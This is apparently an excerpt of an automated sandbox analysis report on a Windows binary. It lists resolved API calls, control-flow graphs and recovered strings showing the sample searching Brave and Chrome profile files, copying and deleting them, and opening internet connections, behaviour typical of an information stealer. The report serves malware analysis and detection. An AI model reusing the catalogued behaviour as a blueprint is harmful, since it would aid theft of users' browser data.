                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF790), ref: 00416307
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF7A8), ref: 00416320
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF7F0), ref: 00416338
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF7D8), ref: 00416350
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE1C8), ref: 00416369
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE0A8), ref: 00416381
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE268), ref: 00416399
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE308), ref: 004163B2
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF808), ref: 004163CA
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF7C0), ref: 004163E2
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBD060), ref: 004163FB
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE328), ref: 00416413
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBF820), ref: 0041642B
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7B70), ref: 00416444
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7BB8), ref: 0041645C
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7B58), ref: 00416474
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE388), ref: 0041648D
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7B40), ref: 004164A5
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7B88), ref: 004164BD
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7B10), ref: 004164D6
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7BA0), ref: 004164EE
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7BD0), ref: 00416506
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7B28), ref: 0041651F
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD78A0), ref: 00416537
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7900), ref: 0041654F
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD78B8), ref: 00416568
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02D91AA0), ref: 00416580
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7AE0), ref: 00416598
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7A98), ref: 004165B1
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE008), ref: 004165C9
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7918), ref: 004165E1
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE028), ref: 004165FA
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7A50), ref: 00416612
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DD7828), ref: 0041662A
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE068), ref: 00416643
                                                                                                      • GetProcAddress.KERNEL32(74DD0000,02DBE0C8), ref: 0041665B
                                                                                                      • LoadLibraryA.KERNEL32(02DD7A68,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                      • LoadLibraryA.KERNEL32(02DD78D0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                      • LoadLibraryA.KERNEL32(02DD7AF8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                      • LoadLibraryA.KERNEL32(02DD7930,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                      • LoadLibraryA.KERNEL32(02DD7A80,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                      • LoadLibraryA.KERNEL32(02DD7810,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                      • LoadLibraryA.KERNEL32(02DD79D8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                      • LoadLibraryA.KERNEL32(02DD7A20,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                      • GetProcAddress.KERNEL32(75290000,02DBE5A8), ref: 0041670A
                                                                                                      • GetProcAddress.KERNEL32(75290000,02DD7990), ref: 00416722
                                                                                                      • GetProcAddress.KERNEL32(75290000,02DD5210), ref: 0041673A
                                                                                                      • GetProcAddress.KERNEL32(75290000,02DD7AB0), ref: 00416753
                                                                                                      • GetProcAddress.KERNEL32(75290000,02DBE608), ref: 0041676B
                                                                                                      • GetProcAddress.KERNEL32(734C0000,02DBD1C8), ref: 00416790
                                                                                                      • GetProcAddress.KERNEL32(734C0000,02DBE4E8), ref: 004167A9
                                                                                                      • GetProcAddress.KERNEL32(734C0000,02DBCBB0), ref: 004167C1
                                                                                                      • GetProcAddress.KERNEL32(734C0000,02DD7888), ref: 004167D9
                                                                                                      • GetProcAddress.KERNEL32(734C0000,02DD7858), ref: 004167F2
                                                                                                      • GetProcAddress.KERNEL32(734C0000,02DBE548), ref: 0041680A
                                                                                                      • GetProcAddress.KERNEL32(734C0000,02DBE468), ref: 00416822
                                                                                                      • GetProcAddress.KERNEL32(734C0000,02DD7948), ref: 0041683B
                                                                                                      • GetProcAddress.KERNEL32(752C0000,02DBE5E8), ref: 0041685C
                                                                                                      • GetProcAddress.KERNEL32(752C0000,02DBE428), ref: 00416874
                                                                                                      • GetProcAddress.KERNEL32(752C0000,02DD7A38), ref: 0041688D
                                                                                                      • GetProcAddress.KERNEL32(752C0000,02DD79F0), ref: 004168A5
                                                                                                      • GetProcAddress.KERNEL32(752C0000,02DBE748), ref: 004168BD
                                                                                                      • GetProcAddress.KERNEL32(74EC0000,02DBCF20), ref: 004168E3
                                                                                                      • GetProcAddress.KERNEL32(74EC0000,02DBCAC0), ref: 004168FB
                                                                                                      • GetProcAddress.KERNEL32(74EC0000,02DD7AC8), ref: 00416913
                                                                                                      • GetProcAddress.KERNEL32(74EC0000,02DBE4A8), ref: 0041692C
                                                                                                      • GetProcAddress.KERNEL32(74EC0000,02DBE6C8), ref: 00416944
                                                                                                      • GetProcAddress.KERNEL32(74EC0000,02DBCEF8), ref: 0041695C
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DD78E8), ref: 00416982
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DBE488), ref: 0041699A
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DD5200), ref: 004169B2
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DD7960), ref: 004169CB
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DD7978), ref: 004169E3
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DBE688), ref: 004169FB
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DBE448), ref: 00416A14
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DD7840), ref: 00416A2C
                                                                                                      • GetProcAddress.KERNEL32(75BD0000,02DD7870), ref: 00416A44
                                                                                                      • GetProcAddress.KERNEL32(75A70000,02DBE6A8), ref: 00416A66
                                                                                                      • GetProcAddress.KERNEL32(75A70000,02DD79A8), ref: 00416A7E
                                                                                                      • GetProcAddress.KERNEL32(75A70000,02DD79C0), ref: 00416A96
                                                                                                      • GetProcAddress.KERNEL32(75A70000,02DD7A08), ref: 00416AAF
                                                                                                      • GetProcAddress.KERNEL32(75A70000,02DD7E28), ref: 00416AC7
                                                                                                      • GetProcAddress.KERNEL32(75450000,02DBE4C8), ref: 00416AE8
                                                                                                      • GetProcAddress.KERNEL32(75450000,02DBE6E8), ref: 00416B01
                                                                                                      • GetProcAddress.KERNEL32(75DA0000,02DBE708), ref: 00416B22
                                                                                                      • GetProcAddress.KERNEL32(75DA0000,02DD7ED0), ref: 00416B3A
                                                                                                      • GetProcAddress.KERNEL32(6F090000,02DBE508), ref: 00416B60
                                                                                                      • GetProcAddress.KERNEL32(6F090000,02DBE528), ref: 00416B78
                                                                                                      • GetProcAddress.KERNEL32(6F090000,02DBE728), ref: 00416B90
                                                                                                      • GetProcAddress.KERNEL32(6F090000,02DD7CA8), ref: 00416BA9
                                                                                                      • GetProcAddress.KERNEL32(6F090000,02DBE568), ref: 00416BC1
                                                                                                      • GetProcAddress.KERNEL32(6F090000,02DBE588), ref: 00416BD9
                                                                                                      • GetProcAddress.KERNEL32(6F090000,02DBE5C8), ref: 00416BF2
                                                                                                      • GetProcAddress.KERNEL32(6F090000,02DBE768), ref: 00416C0A
                                                                                                      • GetProcAddress.KERNEL32(75AF0000,02DD7EA0), ref: 00416C2B
                                                                                                      • GetProcAddress.KERNEL32(75AF0000,02DD5220), ref: 00416C44
                                                                                                      • GetProcAddress.KERNEL32(75AF0000,02DD7D20), ref: 00416C5C
                                                                                                      • GetProcAddress.KERNEL32(75AF0000,02DD7C18), ref: 00416C74
                                                                                                      • GetProcAddress.KERNEL32(75D90000,02DBE3C8), ref: 00416C96
                                                                                                      • GetProcAddress.KERNEL32(6F830000,02DD7C30), ref: 00416CB7
                                                                                                      • GetProcAddress.KERNEL32(6F830000,02DBE628), ref: 00416CCF
                                                                                                      • GetProcAddress.KERNEL32(6F830000,02DD7D98), ref: 00416CE8
                                                                                                      • GetProcAddress.KERNEL32(6F830000,02DD7E58), ref: 00416D00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 2238633743-0
                                                                                                      • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                      • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                      • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                      • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237filestringCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • wsprintfA.USER32 ref: 00411669
                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                      • lstrcat.KERNEL32(?,?), ref: 004116D2
                                                                                                      • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                      • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
                                                                                                      • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                      • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                      • API String ID: 1125553467-2524465048
                                                                                                      • Opcode ID: 1c5a19b8d0364035e361803f1f2d8b881592936573ce4df1f42e7415625cdfa2
                                                                                                      • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                      • Opcode Fuzzy Hash: 1c5a19b8d0364035e361803f1f2d8b881592936573ce4df1f42e7415625cdfa2
                                                                                                      • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 720 40b610-40b6a2 call 416d40 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 call 416d40 * 2 call 4170d0 FindFirstFileA 739 40b6e1-40b6f5 StrCmpCA 720->739 740 40b6a4-40b6dc call 416e00 * 6 call 413220 720->740 741 40b6f7-40b70b StrCmpCA 739->741 742 40b70d 739->742 785 40bf8b-40bf8e 740->785 741->742 744 40b712-40b78b call 416e20 call 416f20 call 416fb0 * 2 call 416ea0 call 416e00 * 3 741->744 745 40bf30-40bf43 FindNextFileA 742->745 790 40b791-40b7e6 call 416fb0 * 4 call 416ea0 744->790 791 40b81c-40b89d call 416fb0 * 4 call 416ea0 call 416e00 * 4 744->791 745->739 747 40bf49-40bf86 FindClose call 416e00 * 6 call 413220 745->747 747->785 810 40b7eb-40b817 call 416e00 * 4 790->810 827 40b8a2-40b8b8 call 4170d0 StrCmpCA 791->827 810->827 830 40ba79-40ba8f StrCmpCA 827->830 831 40b8be-40b8d2 StrCmpCA 827->831 833 40ba91-40bad1 call 401500 call 416da0 * 3 call 409b30 830->833 834 40bade-40baf4 StrCmpCA 830->834 831->830 832 40b8d8-40b9f2 call 416d40 call 415260 call 416fb0 call 416f20 call 416ea0 call 416e00 * 3 call 4170d0 * 2 CopyFileA call 416d40 call 416fb0 * 2 call 416ea0 call 416e00 * 2 call 416da0 call 4093a0 831->832 987 40b9f4-40ba36 call 416da0 call 401500 call 404dc0 call 416e00 832->987 988 40ba3b-40ba74 call 4170d0 DeleteFileA call 417040 call 4170d0 call 416e00 * 2 832->988 897 40bad6-40bad9 833->897 837 40bb66-40bb7e call 416da0 call 415490 834->837 838 40baf6-40bb0d call 4170d0 StrCmpCA 834->838 862 40bc51-40bc66 StrCmpCA 837->862 863 40bb84-40bb8b 837->863 850 40bb61 838->850 851 40bb0f-40bb5b call 401500 call 416da0 * 3 call 40a030 838->851 853 40beb9-40bec2 850->853 851->850 859 40bf20-40bf2b call 417040 * 2 853->859 860 40bec4-40bf15 call 401500 call 416da0 * 2 call 416d40 call 40b610 853->860 859->745 935 40bf1a 860->935 870 40be50-40be65 StrCmpCA 862->870 871 40bc6c-40bdcf call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 * 2 CopyFileA call 401500 call 416da0 * 3 call 40a6e0 call 401500 call 416da0 * 3 call 40ace0 call 4170d0 StrCmpCA 862->871 864 40bbf7-40bc41 call 401500 call 416da0 call 416d40 call 416da0 call 40a030 863->864 865 40bb8d-40bb94 863->865 943 40bc46 864->943 873 40bbf5 865->873 874 40bb96-40bbef call 401500 call 416da0 call 416d40 call 416da0 call 40a030 865->874 870->853 879 40be67-40beae call 401500 call 416da0 * 3 call 40aa20 870->879 1019 40bdd1-40be1b call 401500 call 416da0 * 3 call 40b250 871->1019 1020 40be26-40be3e call 4170d0 DeleteFileA call 417040 871->1020 891 40bc4c 873->891 874->873 946 40beb3 879->946 891->853 897->853 935->859 943->891 946->853 987->988 988->830 1036 40be20 1019->1036 1027 40be43-40be4e call 416e00 1020->1027 1027->853 1036->1020
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
                                                                                                      • FindClose.KERNEL32(000000FF), ref: 0040BF4D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                      • API String ID: 3334442632-726946144
                                                                                                      • Opcode ID: 2bea4be879b4c07dc692db0783b781ac6eeba21f1432059b5c9109fef96b76dc
                                                                                                      • Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
                                                                                                      • Opcode Fuzzy Hash: 2bea4be879b4c07dc692db0783b781ac6eeba21f1432059b5c9109fef96b76dc
                                                                                                      • Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
                                                                                                      • InternetOpenA.WININET(0041D79B,00000000,00000000,00000000,00000000), ref: 00404CAA
                                                                                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00404CD1
                                                                                                      • InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
                                                                                                      • InternetCloseHandle.WININET(c.A), ref: 00404D75
                                                                                                      • InternetCloseHandle.WININET(?), ref: 00404D82
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                                                                      • String ID: c.A$c.A
                                                                                                      • API String ID: 3066467675-270182787
                                                                                                      • Opcode ID: fcecdc0113d85318793fd84deb2f89eac7e502c6f555e42ff774b71d9ce7f9e0
                                                                                                      • Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
                                                                                                      • Opcode Fuzzy Hash: fcecdc0113d85318793fd84deb2f89eac7e502c6f555e42ff774b71d9ce7f9e0
                                                                                                      • Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1888 4015c0-4015f3 call 416d40 * 2 1893 401610-401650 call 4154e0 call 416f20 call 416ea0 call 416e00 * 2 1888->1893 1894 4015f5-4015fc 1888->1894 1903 4016d7-4016db 1893->1903 1895 401655-401695 call 4154e0 call 416f20 call 416ea0 call 416e00 * 2 1894->1895 1896 4015fe-401605 1894->1896 1895->1903 1899 401697-4016d2 call 4154e0 call 416f20 call 416ea0 call 416e00 * 2 1896->1899 1900 40160b 1896->1900 1899->1903 1900->1903 1908 4016e1-401761 call 416f20 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 4 1903->1908 1909 401766-4017fe call 416f20 call 416fb0 call 416f20 call 416fb0 call 416f20 call 416ea0 call 416e00 * 5 1903->1909 1967 401803-401820 call 4170d0 FindFirstFileA 1908->1967 1909->1967 1973 401822-401852 call 416e00 * 5 call 413220 1967->1973 1974 401857-40186b StrCmpCA 1967->1974 2020 401d62-401d65 1973->2020 1975 401883 1974->1975 1976 40186d-401881 StrCmpCA 1974->1976 1979 401cff-401d12 FindNextFileA 1975->1979 1976->1975 1978 401888-40189c call 416d40 1976->1978 1988 4018a2-401983 call 416f20 call 416fb0 call 416f20 call 416fb0 * 3 call 416f20 call 416ea0 call 416e00 * 7 1978->1988 1989 401988-401a29 call 416f20 call 416fb0 call 416f20 call 416fb0 * 2 call 416ea0 call 416e00 * 5 1978->1989 1979->1974 1983 401d18-401d5d FindClose call 417040 * 2 call 416e00 * 5 call 413220 1979->1983 1983->2020 2054 401a2e-401a49 call 416da0 call 415490 1988->2054 1989->2054 2064 401cf4-401cfa call 416e00 2054->2064 2065 401a4f-401aec call 416d40 call 416fb0 * 2 call 416f20 call 416fb0 call 416ea0 call 416e00 * 4 2054->2065 2064->1979 2091 401b1e-401b22 2065->2091 2092 401aee-401b02 call 416fb0 2065->2092 2094 401b71-401b9c call 416fb0 call 416ea0 call 416e00 2091->2094 2095 401b24-401b6f call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 2091->2095 2096 401b07-401b19 call 416ea0 call 416e00 2092->2096 2111 401ba1-401c5f call 416d40 call 415260 call 416fb0 call 416f20 call 416ea0 call 416e00 * 3 call 4170d0 * 2 CopyFileA call 416da0 call 4093a0 2094->2111 2095->2111 2096->2091 2140 401c61-401ca3 call 416da0 call 401500 call 404dc0 call 416e00 2111->2140 2141 401ca8-401cef call 4170d0 DeleteFileA call 417040 * 2 call 415070 call 416e00 * 2 2111->2141 2140->2141 2141->2064
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                      • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                      • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                      • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                      • String ID: \*.*
                                                                                                      • API String ID: 1415058207-1173974218
                                                                                                      • Opcode ID: 499d1c06c2026e2338a7c3e8ee12ae88e0e1a5ccf7c85ab042ff8c887cb7d259
                                                                                                      • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                      • Opcode Fuzzy Hash: 499d1c06c2026e2338a7c3e8ee12ae88e0e1a5ccf7c85ab042ff8c887cb7d259
                                                                                                      • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
